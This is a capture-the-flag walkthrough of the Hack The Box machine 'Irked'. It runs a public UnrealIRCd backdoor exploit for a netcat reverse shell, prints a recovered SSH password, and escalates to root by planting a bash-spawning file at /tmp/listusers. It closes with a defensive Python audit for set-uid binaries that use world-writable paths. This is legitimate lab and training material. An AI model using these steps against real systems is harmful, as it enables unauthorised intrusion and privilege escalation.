I remember my site’s user password :).
| Machine Name | OS | Category | Difficulty | Link |
|---|---|---|---|---|
| Irked | Linux | Vulnerability Assessment | Easy | Link |

First, I scan the target machine with nmap.
nmap -sV -Pn -p- 10.10.10.117

I check whether the service versions on the open ports are vulnerable, and UnrealIRCd is. I found an exploit on GitHub that gives a reverse shell.

git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.git

python3 exploit.py 10.10.10.117 8067 -payload netcat
When I use the exploit, I get a shell (you can change the IP in the exploit to your own IP for the reverse shell).
After half an hour, I find a clue in the .backup file.


This could be the password for the image seen on the website's index page. I can extract the hidden data from the image with steghide; it asks for a password, and I enter the password.
steghide --extract -sf irked.jpg

This reveals the SSH password, and I connect to the target machine via SSH.
password=Kab6h+m+bbp2J:HG
ssh djmardov@10.10.10.117

I upload linpeas to the target machine and run it to look for privilege escalation paths.

viewuser is interesting, as linpeas says.
I execute the tool and get an error that there is no file /tmp/listusers.

I create a file named listusers and write bash into it.

I make the file executable with chmod +x listusers.
I execute the tool.
Finally I got a shell.
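
The root cause of the last step is a program that executes a fixed path under /tmp, a directory any local user can write to. The audit below is an added example, not part of the original write-up: it lists set-uid/set-gid files whose embedded strings point into world-writable directories. It assumes viewuser is set-uid (the write-up does not say so); the function names, directory list and sample bytes are constructed for illustration.

```python
import os
import re
import stat

# Directories any local user can normally write to (assumed list).
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Runs of 4+ printable ASCII bytes, the same idea as the `strings` utility.
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
PATH = re.compile(r"/[A-Za-z0-9._/-]+")  # absolute path inside a run


def risky_paths(blob: bytes) -> list:
    """Return embedded absolute paths that live in a world-writable directory."""
    found = []
    for run in PRINTABLE.findall(blob):
        for path in PATH.findall(run.decode("ascii")):
            if path.startswith(WORLD_WRITABLE_DIRS) and path not in found:
                found.append(path)
    return found


def audit(root: str) -> dict:
    """Map each set-uid/set-gid regular file under root to its risky paths."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                mode = os.lstat(full).st_mode
                if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
                    continue
                with open(full, "rb") as fh:
                    hits = risky_paths(fh.read())
            except OSError:
                continue  # unreadable or vanished file: skip it
            if hits:
                report[full] = hits
    return report


# Constructed sample: bytes shaped like a binary's string table, not the real viewuser.
SAMPLE = b"\x7fELF\x02\x01\x00who\x00/tmp/listusers\x00/usr/bin/id\x00\x01\x02/var/tmp/x\x00"

if __name__ == "__main__":
    print(risky_paths(SAMPLE))
```

Any hit is worth reviewing by hand: the fix is to have the privileged program use a path only root can write, or to remove the set-uid bit if it is not needed.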
